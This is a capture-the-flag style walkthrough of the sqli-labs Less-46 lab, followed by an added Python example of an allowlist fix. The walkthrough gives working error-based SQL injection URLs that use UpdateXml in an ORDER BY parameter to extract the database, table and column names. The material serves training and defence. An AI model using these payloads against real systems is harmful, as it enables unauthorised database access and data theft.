  • 【sqli-labs】 Less-46 GET - Error based - Numeric - Order By Clause (GET-based, error-based numeric ORDER BY clause injection)

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=1

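    An error is returned when sort=4.

    This shows that the parameter is appended after ORDER BY.

    The error message is not suppressed, so the UpdateXml function can be used directly to trigger an error: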

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)%23

    http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1)%23
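
    The defensive counterpart to the ORDER BY injection above, as an added example (not code from the original post or from sqli-labs): the sort key cannot be fixed with a bound parameter, so it is mapped through an allowlist instead. It uses Python's sqlite3 with a constructed three-column users table as a stand-in for the lab's MySQL database; the function names and sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (assumption).
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# Allowlist: the only values ?sort= may take, each mapped to a fixed column name.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}


def make_db():
    """Build an in-memory database holding the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def build_query_vulnerable(sort):
    """Pattern the lesson exercises: the raw parameter becomes SQL text."""
    return "SELECT * FROM users ORDER BY " + sort


def list_users_bound(db, sort):
    """Binding the value is injection-safe but does not sort: a bound
    parameter is a constant expression, not a column reference."""
    return db.execute("SELECT * FROM users ORDER BY ?", (sort,)).fetchall()


def list_users_safe(db, sort):
    """Only identifiers taken from the allowlist ever reach the SQL text."""
    column = SORT_COLUMNS.get(sort)
    if column is None:
        # Rejected in the application, so no database error text is produced.
        raise ValueError("unsupported sort key")
    return db.execute(f"SELECT * FROM users ORDER BY {column}").fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_users_safe(db, "2"))
    try:
        list_users_safe(db, "4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)#")
    except ValueError as exc:
        print("rejected:", exc)
```

    Returning a generic error page instead of the raw database error closes the second condition the walkthrough relies on.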

  • Original article: https://www.cnblogs.com/omnis/p/8391524.html